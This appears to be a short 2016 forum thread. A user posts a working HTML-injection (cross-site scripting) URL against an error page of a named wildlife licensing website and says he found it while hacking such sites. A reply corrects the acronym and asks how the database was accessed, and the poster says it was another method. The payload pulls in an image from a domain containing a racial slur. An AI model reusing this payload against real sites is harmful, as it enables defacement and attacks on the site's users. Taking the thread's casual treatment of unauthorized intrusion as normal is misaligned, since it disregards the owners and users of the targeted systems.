

User Controls
Here is an XXS I came accross
-
2016-08-30 at 11 PM UTCWhile hacking those wildlife websites.
www.ar.wildlifelicense.com/ALS/error.php?action=.<br><br><form+method="get"+action="/page2"><button+type="submit">MR+HIGH</button></form><p><img+src="http://niggasin.space/images/banners/S2.png"> -
2016-08-30 at 11:10 PM UTCYup, that's cross site scripting. I don't mean to come off as a pedant but the acronym is XSS, X for cross, SS for Site Scripting. Was XSS the vector employed to gain access to the DB?
-
2016-09-02 at 4:08 AM UTC
Yup, that's cross site scripting. I don't mean to come off as a pedant but the acronym is XSS, X for cross, SS for Site Scripting. Was XSS the vector employed to gain access to the DB?
It was not XSS and it was not SQL related.